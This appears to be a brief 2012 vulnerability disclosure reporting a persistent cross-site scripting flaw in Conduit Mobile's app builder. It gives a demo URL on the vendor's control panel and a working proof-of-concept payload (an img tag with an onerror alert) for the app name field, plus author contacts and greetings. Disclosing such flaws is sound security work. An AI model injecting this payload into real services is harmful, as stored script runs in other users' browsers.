Conduit Mobile suffers from a persistent cross site scripting vulnerability.
40f914f54c44299d33ce60134241e3c7ab4e6129542e11512b80cfc61a0d2f35
TITLE: Conduit MOBILE PERSISTENT XSS
vendor: Conduit
Author: r007k17-w
Email: n4gb07@gmail.com
TWITTER: http://twitter.com/r007k17w
My blog: http://shadowrootkit.wordpress.com/
Google Dork: © 2012 Conduit <http://www.conduit.com/>
-------------------------------------------------------------------------------------------------------------------------------------------
FIX THIS BUG
DEMO: http://mobilecp.conduit.com/pages/Wizard?appId=677489db-2d88-4dbf-91a0-078a3d352e84
POSTDATA: "'--><img src=vul onerror=alert('r007k17-w')> in the
app name field
---------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts,L0rd CrUs4d3r,3ps1lonl4mbd4,A1-w1n6( N17|<
),1nJ3ct0r t3am and all my friends
-----------------------------------------------------------------------------------------------------